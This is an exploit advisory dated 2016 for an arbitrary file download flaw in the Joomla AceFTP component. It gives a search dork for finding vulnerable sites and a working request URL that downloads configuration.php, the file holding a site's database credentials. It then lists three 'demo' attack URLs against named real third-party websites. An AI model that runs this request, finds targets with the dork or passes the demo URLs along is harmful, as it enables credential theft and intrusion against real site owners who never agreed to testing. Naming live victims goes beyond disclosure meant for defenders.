Joomla AceFTP Arbitrary File Download
Posted on 16 August 2016
############################################################## # Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability # Exploit Author: howucan # Website : http://howucan.gr # Dork : inurl:/administrator/components/com_aceftp/ # Software Website : http://www.joomace.net/downloads/aceftp # Version : ALL # Date : 2016/08/15 # Tested on : Parrot Os 3.1 # Category: webapps # Video : https://www.youtube.com/watch?v=aMy0oDdg7Ug # ######################## # Description : # # AceFTP is a smart, fast and lightweight file manager component. It # operates from Joomla back-end so you don't have to use any FTP program anymore. ######################## # POC : # # http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes ############## # Demo1 : www.iraqcoc.ir/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes # Demo2 : www.diethneis-sxeseis.gr/site/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes # Demo3 : www.rederural.pt/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes # ################################ # # PAOK G4 Salonika Punk Rock City ################################